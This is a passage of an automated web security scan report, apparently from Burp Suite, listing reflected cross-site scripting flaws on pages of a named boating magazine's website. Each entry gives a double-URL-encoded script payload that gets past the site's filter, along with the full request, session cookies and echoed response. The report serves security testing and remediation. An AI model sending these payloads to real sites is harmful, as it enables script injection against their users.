<link href="/boat-shop/on-powerboats?92b7d"><script>alert(1)</script>e206520e3f2=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

2.10. http://www.soundingsonline.com/boat-shop/on-sailboats [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/on-sailboats

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 762e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef7a555db9a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 762e6"><script>alert(1)</script>f7a555db9a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /boat-shop/on-sailboats?762e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef7a555db9a8=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:14 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop/on-sailboats?762e6"><script>alert(1)</script>f7a555db9a8=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

2.11. http://www.soundingsonline.com/boat-shop/q-a-a [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/q-a-a

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99846%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1cbca046523 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 99846"><script>alert(1)</script>1cbca046523 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /boat-shop/q-a-a?99846%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1cbca046523=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop/q-a-a?99846"><script>alert(1)</script>1cbca046523=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

2.12. http://www.soundingsonline.com/boat-shop/sea-savvy [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/sea-savvy

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca2b2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb7d3c3496f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ca2b2"><script>alert(1)</script>b7d3c3496f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /boat-shop/sea-savvy?ca2b2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb7d3c3496f0=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:34 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop/sea-savvy?ca2b2"><script>alert(1)</script>b7d3c3496f0=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

2.13. http://www.soundingsonline.com/boat-shop/tech-talk [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/tech-talk

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c19f9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e422cb04ddca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c19f9"><script>alert(1)</script>422cb04ddca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /boat-shop/tech-talk?c19f9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e422cb04ddca=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:35:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:35:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop/tech-talk?c19f9"><script>alert(1)</script>422cb04ddca=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

2.14. http://www.soundingsonline.com/boat-shop/used-boat-review [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/used-boat-review

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66f91%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebd21e5f0da1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 66f91"><script>alert(1)</script>bd21e5f0da1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /boat-shop/used-boat-review?66f91%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebd21e5f0da1=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop/used-boat-review?66f91"><script>alert(1)</script>bd21e5f0da1=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

2.15. http://www.soundingsonline.com/calendar [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /calendar

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4770b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8ef0412ef3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4770b"><script>alert(1)</script>a8ef0412ef3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /calendar?4770b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8ef0412ef3=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<a href="/calendar?4770b"><script>alert(1)</script>a8ef0412ef3=1&amp;start=15" title="2">
...[SNIP]...

2.16. http://www.soundingsonline.com/career-opportunities [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /career-opportunities

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 122a9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35521301fb8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 122a9"><script>alert(1)</script>35521301fb8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /career-opportunities?122a9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35521301fb8=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:40 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/career-opportunities?122a9"><script>alert(1)</script>35521301fb8=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

2.17. http://www.soundingsonline.com/columns-blogs [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dda8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaa57a1f163c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2dda8"><script>alert(1)</script>aa57a1f163c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /columns-blogs?2dda8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaa57a1f163c=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:36:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:36:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/columns-blogs?2dda8"><script>alert(1)</script>aa57a1f163c=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

2.18. http://www.soundingsonline.com/columns-blogs/bay-tripper [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/bay-tripper

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8455b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e46cc250c867 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8455b"><script>alert(1)</script>46cc250c867 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /columns-blogs/bay-tripper?8455b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e46cc250c867=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:36:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:36:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/columns-blogs/bay-tripper?8455b"><script>alert(1)</script>46cc250c867=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

2.19. http://www.soundingsonline.com/columns-blogs/books [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/books

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ec3c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0df49a7dd23 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8ec3c"><script>alert(1)</script>0df49a7dd23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /columns-blogs/books?8ec3c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0df49a7dd23=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:35:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:35:52 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/columns-blogs/books?8ec3c"><script>alert(1)</script>0df49a7dd23=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

2.20. http://www.soundingsonline.com/columns-blogs/new-england-fishing [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/new-england-fishing

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc3b0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e96642237bfb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dc3b0"><script>alert(1)</script>96642237bfb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /columns-blogs/new-england-fishing?dc3b0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e96642237bfb=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:35 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/columns-blogs/new-england-fishing?dc3b0"><script>alert(1)</script>96642237bfb=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

